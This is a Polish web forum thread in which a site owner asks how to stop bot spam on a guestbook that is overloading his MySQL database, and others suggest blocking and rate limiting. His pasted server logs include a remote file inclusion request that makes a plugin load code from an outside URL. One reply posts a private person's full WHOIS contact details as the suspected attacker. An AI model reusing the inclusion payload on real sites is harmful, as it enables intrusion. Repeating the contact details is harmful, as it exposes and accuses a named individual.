Skocz do zawartości

Atak na serwer


pseudoseowiec

Rekomendowane odpowiedzi

Mam bardzo ciężki pakiet skryptów oparty o mysql. Serwis śmigał bardzo dobrze do puki ktoś nie zaczął spamować księgi gości. Od tego czasu cały serwis padł podając komunikat o tym, że baza danych jest przeciążona i że jest za dużo zapytań do tej konkretnej bazy.

Co wykonałem.

- wyczyściłem plik guestbook.php dodając do niego przekierowanie

<?php
header("HTTP/1.1 301 Moved Permanently"); // ta linjka powie googlebotowi, że ustawiono przekierowanie 301 
header("Location: https://jakasinnastrona.com);
?>

- zoptymalizowałem wszystkie tabele w bazie w phpmyadmin

przykład wejść, IP zmienne

Host: 213.163.65.163


*  


/guestbook.php?owner=1
Http Code: 301 	Date: Apr 11 11:03:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: https://domena.pl/guestbook.php?owner=1&action=show_add
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)




Host: 213.163.65.73


*  


/guestbook.php?owner=27&action=show_add
Http Code: 301 	Date: Apr 11 10:44:01 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





*  


/guestbook.php?owner=2&action=show_add
Http Code: 301 	Date: Apr 11 11:02:10 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





*  


/
Http Code: 200 	Date: Apr 11 11:02:14 	Http Version: HTTP/1.1 	Size in Bytes: 257
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)




Host: 213.163.65.177


*  


/guestbook.php?owner=1
Http Code: 301 	Date: Apr 11 11:01:54 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: https://domena.pl/guestbook.php?owner=1&action=show_add
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)




Host: 85.119.76.136


*  


/
Http Code: 200 	Date: Apr 11 11:01:18 	Http Version: HTTP/1.1 	Size in Bytes: 257
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)




Host: 67.228.201.146


*  


/guestbook.php?owner=1&action=show_add
Http Code: 301 	Date: Apr 11 11:01:08 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)




Host: 94.102.51.184


*  


/guestbook.php?owner=2
Http Code: 301 	Date: Apr 11 11:00:17 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: https://domena.pl/guestbook.php?owner=2&action=show_add
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Jak taki robota nie wpuszczać na serwer?

Odnośnik do komentarza
Udostępnij na innych stronach

Dupek próbuje jeszcze takich chwytów:

Host: 217.118.24.76

*

/index.php?tags_mode=photo/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=https://www.sanctamaria-aarsc

Http Code: 200 Date: Apr 11 10:56:35 Http Version: HTTP/1.1 Size in Bytes: 257

Referer: -

Agent: Mozilla/4.8 [en] (Windows NT 5.0; U)

*

/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=https://www.sanctamaria-aarschot.be/smarts/osy2.txt?

Http Code: 404 Date: Apr 11 10:56:35 Http Version: HTTP/1.1 Size in Bytes: -

Referer: -

Agent: Mozilla/4.8 [en] (Windows NT 5.0; U)

Odnośnik do komentarza
Udostępnij na innych stronach

Zapewne serwer pluje sie o ilość aktywnych połączeń do MySQL :) Ja u siebie na dedykach mam ten problem bardzo często i jedynym rozwiązaniem bylo zwiększenie limitów np na 500 połączeń :P

Od tego czasu nie blokuje sie juz MySQL ;)

Michał Kryński
Zapraszam na moje forum akwarystyczne  ;-) 

 

Odnośnik do komentarza
Udostępnij na innych stronach

jak ataki masz non stop z tego samego ip zablokuj go i po problemie. Gorzej jak to bardziej kumaty koleś lub jakiś dzieciak korzystający z neostrady czy jakiegoś innego adsla ze zmiennym ip.

Wtedy tylko telefon do admina hostingu z prośbą o namierzenie i zablokowanie delikwenta w trochę inny sposób.

Sklep dla sportowców w którym znajdziesz Odżywki oraz suplementy diety dla sportowców, sprzęt siłowy i fitness oraz akcesoria do sportów walki i treningowe Hurt-Detal. Szybka wysyłka na terenie polski i za granicę.

Sklep producenta sprzętu siłowego, fitness oraz akcesoriów do sportów walki. Wysoka jakość, przystepne ceny :)

Odnośnik do komentarza
Udostępnij na innych stronach

Pseudo algorytm:

- Na stronie wejściowej wystawiasz ciacho sprawdzające czy akceptuje ciacha;

- w kodzie dodawania wpisu do bazy spraszasz czy akceptuje ciacha oraz czy może dodawać pod kontem blokady czasowej. Jeśli może dodaje i wystawiasz cicho o czasie życia powiedzmy 24 H. Jeśli będzie chciał dodać z tego samego kopa, ale o innym ip to ważne cicho czasowe zablokuje taką możliwość przed upływem tych 24H. Jeśli wyłączy akceptacje cookie też nie doda :)

if(akceptuje_ciacha)

{

if(!sprawdzasz_ciacho_czasowe)

{

Dodaje WPIS;

wystawiasz_ciacho_czaowe_time()+3600*24;

}

}

Można to też obejść jak zobaczy, że taki mechanizm jest i będzie znał się na rzeczy. Poza tym można zastosować capha itd.

Ale jeśli masz za dużo połączeń to nie jest wina jednego dodawacza, bo musiał by mieć napisane oprogramowanie które wielowątkowo wysyłało by n żądań POST w ciągu sekundy na adres odbiorcy formularza od księgi gości.

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Odnośnik do komentarza
Udostępnij na innych stronach

A ja namierzylem tego, co wrzuca iframe:

Domain Name: GOOOOGLEADSENCE.BIZ

Registrant ID: DI_2408376

Registrant Name: Julia Taukova

Registrant Organization: N/A

Registrant Address1: mustamae 4-11

Registrant City: Tallin

Registrant State/Province: Harjumaa

Registrant Postal Code: 14865

Registrant Country: Estonia

Registrant Country Code: EE

Registrant Phone Number: +37.2953412

Registrant Email: donorsi@yahoo.com

Pytanie - co z takim zrobic ? Tez mi tego nawrzucal na jeden serwer...

Dla tych co lubią na biało i dla tych co na czarno:
logo_ap.jpg godmodelogo.jpg

Odnośnik do komentarza
Udostępnij na innych stronach

Co więcej, jeśli generujesz za duże obciążenie bazy firma może wyłączyć ci hosting, bo tracą na tym i inni userzy tego współdzielonego serwera

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Odnośnik do komentarza
Udostępnij na innych stronach

Zwiększenie limitu to też nie zawsze dobry pomysł. 500 połączeń do bazy to minimum 500 działających procesów apache. Jak masz mało pamięci to sobie sam w ten sposób DDoS'a zrobisz. Czasami lepiej jeśli serwer odrzuci kilka żądań niż go przeciążać.

Lepiej: sprawdź w guestbook.php czy jest ustawione ciastko, jeśli nie -> redirect na pustą stronę która ustawi ciastko + redirect spowrotem. Wada: podstrona wyleci z google.

Odnośnik do komentarza
Udostępnij na innych stronach

Tak poza tym to ten cały opis problemu jest bez ładu i składu. Wkleiłeś jakieś tam dane z których wynika tylko tyle, że były jakieś żądanie GET, a do tego w pewnym przedziale czasowym z różnych IP.

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności